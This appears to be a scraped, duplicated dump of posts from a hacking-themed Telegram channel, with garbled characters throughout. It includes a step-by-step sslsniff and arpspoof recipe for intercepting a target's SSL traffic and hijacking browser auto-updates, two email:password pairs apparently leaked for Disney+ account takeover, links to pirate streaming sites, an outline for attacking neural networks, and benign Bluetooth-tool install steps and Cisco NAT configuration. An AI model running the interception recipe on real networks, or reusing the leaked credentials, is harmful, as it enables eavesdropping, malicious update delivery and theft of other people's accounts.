π¦MITM AUTO Other options:
* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>
* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d
* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p
* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.
* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.
* sslsniff can be configured to only attack certain clients. In this case,
you need to specify -f <ff,ie,safari,opera> -h <$httpListenPort>
* sslsniff can be configured to deny OCSP requests from clients. In this
case, you need to specify -d
* sslsniff can be configured to only log HTTP POSTS. In this case, you
need to specify -p
* sslsniff can be configured to hijack Mozilla auto-updates. In this case,
you need to specify -u <$updateXmlDir>, where $updateXmlDir contains the
XML files for whatever binaries you want to have sslsniff auto-update,
one for each platform. There are sample XML files in the "update"
directory that comes with sslsniff.
* sslsniff can be configured to hijack Firefox/Thunderbird addon
auto-updates. In this case, you need to specify -e <url> -j <sha256sum>
where <url> is the URL where your custom addon is located, and <sha256sum>
is the sha256sum of that addon.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AUTO MITM SETTING UP :
Setting up iptables
-------------------
1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)
2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports <$listenPort>)
3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports <$httpListenPort>)
4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)
5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)
6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)
π¦Setting up pf
-------------
1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.
π¦ Running arpspoof
--------------------------
1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.
2) * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1
At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.
β VERIFIED BY UNDERCODE
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ AUTO MITM SETTING UP :
Setting up iptables
-------------------
1) Flip your machine into ip_forward mode
(echo 1 > /proc/sys/net/ipv4/ip_forward)
2) Add a rule to intercept HTTPS traffic
(iptables -t nat -A PREROUTING -p tcp --destination-port 443
-j REDIRECT --to-ports <$listenPort>)
3) If you're going to do client fingerprinting, add a rule to
intercept HTTP traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 80
-j REDIRECT --to-ports <$httpListenPort>)
4) Add a rule to intercept imaps traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 993 \
-j REDIRECT --to-ports <$listenPort>)
5) Add a rule to intercept pop3s traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 995 \
-j REDIRECT --to-ports <$listenPort>)
6) Add a rule to intercept irc over ssl traffic:
(iptables -t nat -A PREROUTING -p tcp --destination-port 6697 \
-j REDIRECT --to-ports <$listenPort>)
π¦Setting up pf
-------------
1) Basic support for pf is now included. Set up firewall rules similar to
those above, and change util/Destination.cpp by undefining HAVE_NETFILTER
and defining HAVE_PF at the top.
π¦ Running arpspoof
--------------------------
1) Assuming we want to intercept SSL traffic from 172.17.10.36, we need to
trick that host into thinking that we're the router. Using arpspoof, we
can convince the target that the router's MAC address is our MAC address.
2) * arpspoof -i eth0 -t 172.17.10.36 172.17.8.1
At this point, any SSL traffic should get proxied by sslsniff and logged to
a file.
β VERIFIED BY UNDERCODE
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2019-2020 so helpfull scripts termux-linux :
t.me/UndercodeTesting
Make sure you've already git installed. Then you can run the following commands to get the scripts on your computer:
π¦πβπππΈπππππΈπππβ & βπβ :
OS X, Linux and Windows,termux
1) git clone https://github.com/Logan1x/Python-Scripts.git
2) cd Python-Scripts/bin
π¦Air Quality Script
This script renders the air quality from the location of the user
The location is fetched using the user's IP address
This script requires a key from WAQI.
It is free and can be fetched from http://aqicn.org/data-platform/token/#/
Usage Instructions
python air-quality.py token
π¦Approximating pi
This script is useful to show a way to approximate the value of pi using a Monte Carlo method. It is also optimized using the @jit (just-in-time) decorator from the numba library.
π¦Blog Reader
Blog Reader is the terminal reader that scrapes the article from planet dgplug and displays it on the terminal.
It separates the content accrding to the screen size.
python Blog_reader.py
Bulk add users to Twitter list
Simple script helps you mass add users to your twitter list to follow (Ex: Bitcoin/Altcoins official account, news, traders...)
π¦Prepare list screen names
Setup your app and get an access token
pip install twitter
python bulk_add_twitter_list.py
π¦Caesar Cipher
Encrypts or Decrypts any message you want, simply enter the message and the rotation number
python caesar_cipher.py
π¦contributors list :
python .\contributors.py https://github.com/Logan1x/Python-Scripts/
where the argument is the url of the repo
you may need to install packages like PIL@1.1.7 and requests if not installed
π¦End To End Encryption
It is a simple program to implement and understand the basic of end_to_end encryption. Here I am using caesar cipher to encrypt but in reality they use algotihms lile SHA-1, RSA etc.
python end_to_end.py
π¦Expense Manager
Simple GUI program which helps you calculate your expenses, monitor them just through mouse clicks. All you have to do is run the script and choose an option from the menu which will displayed when you run the script. Enter Your Expenses as eg: "Biscuits Rs 15" " rs " ignore the quotes.
python expense_manger.py
π¦Facebook Auto Post
This is python script that log in into facebook and post the status.
You can see live execution of this script here.
pip install -r facebook-auto-post.requirements.txt
python facebook-auto-post.py
Find Large Files
Searches a file location and subdirectories for files larger than a given size. Useful for phones which might hide files in FileExplorer, but allow use as flash memory. Directly prints results if run directly. May also be imported, yielding results one by one.
π¦FTP Download File
A simple application to download a file via FTP with the given remote and local path Parameters:
-hh hostname
-u username
-p password
-rd remote directory
-ld local directory
python ftp_download_file.py
π¦Fetch HTML
This script fetch html response from the provided url and parse xml tag to get only text content and print out.
python fetch_html.py https://github.com
π¦Get External IP
Gets the external IP-Address from the current machine and prints it to the console
python getExternalIp.py
Group files by type
Group files by their extensions
Files are moved into folders with extension names
Usage Instructions
python group_file_by_type.py 'C:\\test\\products'
π¦Handy offline dictionary
A tiny offline dictionary app based on nltk wordnet and pyqt5
cd dictionary
python app.py
β + much more on their readme file
e n j o y
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2019-2020 so helpfull scripts termux-linux :
t.me/UndercodeTesting
Make sure you've already git installed. Then you can run the following commands to get the scripts on your computer:
π¦πβπππΈπππππΈπππβ & βπβ :
OS X, Linux and Windows,termux
1) git clone https://github.com/Logan1x/Python-Scripts.git
2) cd Python-Scripts/bin
π¦Air Quality Script
This script renders the air quality from the location of the user
The location is fetched using the user's IP address
This script requires a key from WAQI.
It is free and can be fetched from http://aqicn.org/data-platform/token/#/
Usage Instructions
python air-quality.py token
π¦Approximating pi
This script is useful to show a way to approximate the value of pi using a Monte Carlo method. It is also optimized using the @jit (just-in-time) decorator from the numba library.
π¦Blog Reader
Blog Reader is the terminal reader that scrapes the article from planet dgplug and displays it on the terminal.
It separates the content accrding to the screen size.
python Blog_reader.py
Bulk add users to Twitter list
Simple script helps you mass add users to your twitter list to follow (Ex: Bitcoin/Altcoins official account, news, traders...)
π¦Prepare list screen names
Setup your app and get an access token
pip install twitter
python bulk_add_twitter_list.py
π¦Caesar Cipher
Encrypts or Decrypts any message you want, simply enter the message and the rotation number
python caesar_cipher.py
π¦contributors list :
python .\contributors.py https://github.com/Logan1x/Python-Scripts/
where the argument is the url of the repo
you may need to install packages like PIL@1.1.7 and requests if not installed
π¦End To End Encryption
It is a simple program to implement and understand the basic of end_to_end encryption. Here I am using caesar cipher to encrypt but in reality they use algotihms lile SHA-1, RSA etc.
python end_to_end.py
π¦Expense Manager
Simple GUI program which helps you calculate your expenses, monitor them just through mouse clicks. All you have to do is run the script and choose an option from the menu which will displayed when you run the script. Enter Your Expenses as eg: "Biscuits Rs 15" " rs " ignore the quotes.
python expense_manger.py
π¦Facebook Auto Post
This is python script that log in into facebook and post the status.
You can see live execution of this script here.
pip install -r facebook-auto-post.requirements.txt
python facebook-auto-post.py
Find Large Files
Searches a file location and subdirectories for files larger than a given size. Useful for phones which might hide files in FileExplorer, but allow use as flash memory. Directly prints results if run directly. May also be imported, yielding results one by one.
π¦FTP Download File
A simple application to download a file via FTP with the given remote and local path Parameters:
-hh hostname
-u username
-p password
-rd remote directory
-ld local directory
python ftp_download_file.py
π¦Fetch HTML
This script fetch html response from the provided url and parse xml tag to get only text content and print out.
python fetch_html.py https://github.com
π¦Get External IP
Gets the external IP-Address from the current machine and prints it to the console
python getExternalIp.py
Group files by type
Group files by their extensions
Files are moved into folders with extension names
Usage Instructions
python group_file_by_type.py 'C:\\test\\products'
π¦Handy offline dictionary
A tiny offline dictionary app based on nltk wordnet and pyqt5
cd dictionary
python app.py
β + much more on their readme file
e n j o y
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 movies steam sites :
https://www1.solarmovies.co/
https://tubitv.com/
http://123moviesgo.ga/
http://gostream.site/
https://www.imdb.com/tv/
http://streamm4u.com/
https://www.vudu.com/
https://scr.cr/
https://spacemov.top/
https://www.crackle.com/
https://yesmovies.to/
http://oakmovies.com/
https://filmrise.com/
https://xmovies8.pl/
https://www.popcornflix.com/pages/discover/d/movies
http://www.streamlord.com/
https://www.kanopy.com/
https://www.yidio.com/
https://archive.org/
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 movies steam sites :
https://www1.solarmovies.co/
https://tubitv.com/
http://123moviesgo.ga/
http://gostream.site/
https://www.imdb.com/tv/
http://streamm4u.com/
https://www.vudu.com/
https://scr.cr/
https://spacemov.top/
https://www.crackle.com/
https://yesmovies.to/
http://oakmovies.com/
https://filmrise.com/
https://xmovies8.pl/
https://www.popcornflix.com/pages/discover/d/movies
http://www.streamlord.com/
https://www.kanopy.com/
https://www.yidio.com/
https://archive.org/
@undercodeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
SolarMovies
Watch FREE Movies Online & TV shows - SolarMovies
Watch Movies Online and Watch Tv-Series online On SolarMovies without Registration.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Hacking Neural Networks :
youtube.com/undercode
> an offensive manner (bug hunting, shellcode obfuscation, etc.) and how to exploit neural networks found in the wild (information extraction, malware injection, backdooring, etc.)
π¦The exercises :
0 - Last Layer Attack
1 - Backdooring
2 - Extracting Information
3 - Brute Forcing
4 - Neural Overflow
5 - Malware Injection
6 - Neural Obfuscation
7 - Bug Hunting
8 - GPU Attack
π¦πβπππΈπππππΈπππβ & βπβ :
1) Keras: Installing Keras can be tricky. We refer to the official installation guide at https://keras.io/#installation and suggest TensorFlow as a backend (using the GPU-enabled version, if one is available on the machine).
2) NumPy, SciPy and scikit-image: NumPy and SciPy are excellent helper packages, which are used throughout all exercises. Following the official SciPy instructions should also install NumPy https://www.scipy.org/install.html. We will also need to install scikit-image for image loading and saving: https://scikit-image.org/docs/stable/install.html.
3) PyCuda: PyCuda is required for the GPU-based attack exercise. If no nVidia GPU is available on the machine, this can be skipped. https://wiki.tiker.net/PyCuda/Installation
4) NLTK: NLTK provides functionalities for natural language processing and is very helpful for some of the exercises. https://www.nltk.org/install.html
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦2020 Hacking Neural Networks :
youtube.com/undercode
> an offensive manner (bug hunting, shellcode obfuscation, etc.) and how to exploit neural networks found in the wild (information extraction, malware injection, backdooring, etc.)
π¦The exercises :
0 - Last Layer Attack
1 - Backdooring
2 - Extracting Information
3 - Brute Forcing
4 - Neural Overflow
5 - Malware Injection
6 - Neural Obfuscation
7 - Bug Hunting
8 - GPU Attack
π¦πβπππΈπππππΈπππβ & βπβ :
1) Keras: Installing Keras can be tricky. We refer to the official installation guide at https://keras.io/#installation and suggest TensorFlow as a backend (using the GPU-enabled version, if one is available on the machine).
2) NumPy, SciPy and scikit-image: NumPy and SciPy are excellent helper packages, which are used throughout all exercises. Following the official SciPy instructions should also install NumPy https://www.scipy.org/install.html. We will also need to install scikit-image for image loading and saving: https://scikit-image.org/docs/stable/install.html.
3) PyCuda: PyCuda is required for the GPU-based attack exercise. If no nVidia GPU is available on the machine, this can be skipped. https://wiki.tiker.net/PyCuda/Installation
4) NLTK: NLTK provides functionalities for natural language processing and is very helpful for some of the exercises. https://www.nltk.org/install.html
E N J O Y
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
YouTube
UNDERCODE
FREE AI & CYBERSECURITY TRICKS & MALWARE ANALYSIS HACKS, DAILY MEMES & MINDβBENDING TECH MYSTERIESβ¦ ALL ON UNDERCODE!
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
Stop Scrolling! FREE Cyber & AI Secrets!
UnderCode News: Cyber & Tech Scoops 24/7 β https://UndercodeNews.com
Daily CVE: Fresh Vuln Alertsβ¦
π¦ DISNEY + β
jarrettbuilding@gmail.com:Anom4u8!
saniul@hotmail.com:slAynet1230
jarrettbuilding@gmail.com:Anom4u8!
saniul@hotmail.com:slAynet1230
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BLUETOOTH HACKING :
1) Debian / Ubuntu
sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev \
pkg-config libpcap-dev python-numpy python-pyside python-qt4
Fedora / Red Hat
su -c "yum install libusb1-devel make gcc wget tar bluez-libs-devel"
2) Mac OS X users can use either MacPorts or Homebrew to install the required packages:
brew install libusb wget cmake pkg-config libpcap
or
sudo port install libusb wget cmake python27 py27-numpy py27-pyside
3) FreeBSD users can install the host tools and library directly from the ports and package system:
sudo pkg install ubertooth
libbtbb
4) Next the Bluetooth baseband library (libbtbb) needs to be built for the Ubertooth tools to decode Bluetooth packets:
wget https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz
tar -xf libbtbb-2018-12-R1.tar.gz
cd libbtbb-2018-12-R1
mkdir build
cd build
cmake ..
make
sudo make install
5) Linux users: if you are installing for the first time, or you receive errors about finding the library, you should run:
sudo ldconfig
Ubertooth tools
6) The Ubertooth repository contains host code for sniffing Bluetooth packets, configuring the Ubertooth and updating firmware. All three are built and installed by default using the following method:
π¦πβπππΈπππππΈπππβ & βπβ :
1) wget https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz
2) tar xf ubertooth-2018-12-R1.tar.xz
3) cd ubertooth-2018-12-R1/host
4) mkdir build
5) cd build
6) cmake ..
7) make
8) sudo make install
β >
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦BLUETOOTH HACKING :
1) Debian / Ubuntu
sudo apt-get install cmake libusb-1.0-0-dev make gcc g++ libbluetooth-dev \
pkg-config libpcap-dev python-numpy python-pyside python-qt4
Fedora / Red Hat
su -c "yum install libusb1-devel make gcc wget tar bluez-libs-devel"
2) Mac OS X users can use either MacPorts or Homebrew to install the required packages:
brew install libusb wget cmake pkg-config libpcap
or
sudo port install libusb wget cmake python27 py27-numpy py27-pyside
3) FreeBSD users can install the host tools and library directly from the ports and package system:
sudo pkg install ubertooth
libbtbb
4) Next the Bluetooth baseband library (libbtbb) needs to be built for the Ubertooth tools to decode Bluetooth packets:
wget https://github.com/greatscottgadgets/libbtbb/archive/2018-12-R1.tar.gz -O libbtbb-2018-12-R1.tar.gz
tar -xf libbtbb-2018-12-R1.tar.gz
cd libbtbb-2018-12-R1
mkdir build
cd build
cmake ..
make
sudo make install
5) Linux users: if you are installing for the first time, or you receive errors about finding the library, you should run:
sudo ldconfig
Ubertooth tools
6) The Ubertooth repository contains host code for sniffing Bluetooth packets, configuring the Ubertooth and updating firmware. All three are built and installed by default using the following method:
π¦πβπππΈπππππΈπππβ & βπβ :
1) wget https://github.com/greatscottgadgets/ubertooth/releases/download/2018-12-R1/ubertooth-2018-12-R1.tar.xz
2) tar xf ubertooth-2018-12-R1.tar.xz
3) cd ubertooth-2018-12-R1/host
4) mkdir build
5) cd build
6) cmake ..
7) make
8) sudo make install
β >
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Configuration example of proxy server and router
fb.com/UndercodeTesting
1) rapid development of network technology, so that enterprises LAN access INTERNET more and more ways to share resources, For the most part, DDN special line with its stable performance, expansion The advantage of good performance has become a commonly used method.
2) The DDN connection is simple in terms of hardware requirements. Only one router (router) and proxy server (proxy server) are required, but many system configuration Network managers are a more difficult problem. Taking CISCO routers as an example, the author introduces several successful configuration methods for the reference of peers:
1. Configuration of accessing Internet resources directly through the router
2. The general idea and the equipment connection method
In general, Internal LAN use reserved addresses on the INTERNET:
10.0.0.0/8:10.0.0.0~10.255.255.255
172.16.0.0/12:172.16.0.0~172.31.255.255
192.168. 0.0 / 16: 192.168.0.0 ~ 192.168.255.255
3.Under normal circumstances, when the workstations inside the unit directly use routing to access externally, they will be filtered out by the router because the workstations use reserved addresses on the Internet, resulting in inaccessibility Internet resources. The solution to this problem is to use the NAT (Network Address Translation) address translation function provided by the routing operating system to convert the private address of the internal network into a legal address on the Internet, so that users without a legal IP address can access it through NAT. External Internet. The advantage of this is that there is no need to be equipped with a proxy server, reducing investment, it can also save legal IP addresses and improve the security of the internal network.
4.There are two types of NAT: Single mode and global mode.
Using the single mode of NAT, just like its name, it can map many local LAN hosts to an Internet address. All hosts in the local area network are regarded as an Internet user to the external Internet network. Hosts in the local area network continue to use the local address.
Using the global mode of NAT, the router's interface maps many local LAN hosts to a certain range of Internet addresses (IP address pool). When the local host port is connected to a host on the Internet, an IP address in the IP address pool is automatically assigned to the local host. The dynamically assigned IP address will be released after the connection is interrupted, and the released IP address can be used by other local hosts. use.
Taking the network environment of my unit as an example, the configuration method and process are listed below for your reference.
Our unit uses Unicom optical cable (V.35) to connect to the Internet. The router is CISCO2610. The LAN uses INTEL550 100M switch. Unicom provides us with the following four IP addresses:
211.90.137.25 (255.255.255.252) for local WAN port router
port 211.90.137.26 (255.255.255.252) for the other side (China Unicom) is
211.90.139.41 (255.255.255.252) for their disposal
211.90.139.42 (255.255.255.252) for their disposal
π¦Configuration example of proxy server and router
fb.com/UndercodeTesting
1) rapid development of network technology, so that enterprises LAN access INTERNET more and more ways to share resources, For the most part, DDN special line with its stable performance, expansion The advantage of good performance has become a commonly used method.
2) The DDN connection is simple in terms of hardware requirements. Only one router (router) and proxy server (proxy server) are required, but many system configuration Network managers are a more difficult problem. Taking CISCO routers as an example, the author introduces several successful configuration methods for the reference of peers:
1. Configuration of accessing Internet resources directly through the router
2. The general idea and the equipment connection method
In general, Internal LAN use reserved addresses on the INTERNET:
10.0.0.0/8:10.0.0.0~10.255.255.255
172.16.0.0/12:172.16.0.0~172.31.255.255
192.168. 0.0 / 16: 192.168.0.0 ~ 192.168.255.255
3.Under normal circumstances, when the workstations inside the unit directly use routing to access externally, they will be filtered out by the router because the workstations use reserved addresses on the Internet, resulting in inaccessibility Internet resources. The solution to this problem is to use the NAT (Network Address Translation) address translation function provided by the routing operating system to convert the private address of the internal network into a legal address on the Internet, so that users without a legal IP address can access it through NAT. External Internet. The advantage of this is that there is no need to be equipped with a proxy server, reducing investment, it can also save legal IP addresses and improve the security of the internal network.
4.There are two types of NAT: Single mode and global mode.
Using the single mode of NAT, just like its name, it can map many local LAN hosts to an Internet address. All hosts in the local area network are regarded as an Internet user to the external Internet network. Hosts in the local area network continue to use the local address.
Using the global mode of NAT, the router's interface maps many local LAN hosts to a certain range of Internet addresses (IP address pool). When the local host port is connected to a host on the Internet, an IP address in the IP address pool is automatically assigned to the local host. The dynamically assigned IP address will be released after the connection is interrupted, and the released IP address can be used by other local hosts. use.
Taking the network environment of my unit as an example, the configuration method and process are listed below for your reference.
Our unit uses Unicom optical cable (V.35) to connect to the Internet. The router is CISCO2610. The LAN uses INTEL550 100M switch. Unicom provides us with the following four IP addresses:
211.90.137.25 (255.255.255.252) for local WAN port router
port 211.90.137.26 (255.255.255.252) for the other side (China Unicom) is
211.90.139.41 (255.255.255.252) for their disposal
211.90.139.42 (255.255.255.252) for their disposal
Facebook
Log in or sign up to view
See posts, photos and more on Facebook.
π¦Configuration example of proxy server and router part 2
2) The configuration of the router
en
config t
> ip nat pool c2610 211.90.139.41 211.90.139.42 netmask 255.255.255.252
(define an address pool c2601, which contains two free legal IP addresses for NAT Used during conversion)
int e0 / 0
ip address 192.168.0.3 255.255.255.0
ip nat inside
exit
> (set the IP address of the Ethernet port and set it as the port connected to the internal network)
interface s0 / 0
ip address 211.90.137.25 255.255.255.252
ip nat outside
exit
> (Set the IP address of the WAN port and set it as the port to connect to the external network)
ip route 0.0.0.0 0.0.0.0 211.90.137.26
(set the dynamic route)
access-list 2 permit 192.168.0.1 0.0.0.255
(establish the access control list )
! Dynamic NAT
!
Ip nat inside source list 2 pool c2610 overload
(establish dynamic address translation)
line console 0
exec-timeout 0 0
!
Line vty 0 4
end
wr
(save the settings made)
2) The configuration of the router
en
config t
> ip nat pool c2610 211.90.139.41 211.90.139.42 netmask 255.255.255.252
(define an address pool c2601, which contains two free legal IP addresses for NAT Used during conversion)
int e0 / 0
ip address 192.168.0.3 255.255.255.0
ip nat inside
exit
> (set the IP address of the Ethernet port and set it as the port connected to the internal network)
interface s0 / 0
ip address 211.90.137.25 255.255.255.252
ip nat outside
exit
> (Set the IP address of the WAN port and set it as the port to connect to the external network)
ip route 0.0.0.0 0.0.0.0 211.90.137.26
(set the dynamic route)
access-list 2 permit 192.168.0.1 0.0.0.255
(establish the access control list )
! Dynamic NAT
!
Ip nat inside source list 2 pool c2610 overload
(establish dynamic address translation)
line console 0
exec-timeout 0 0
!
Line vty 0 4
end
wr
(save the settings made)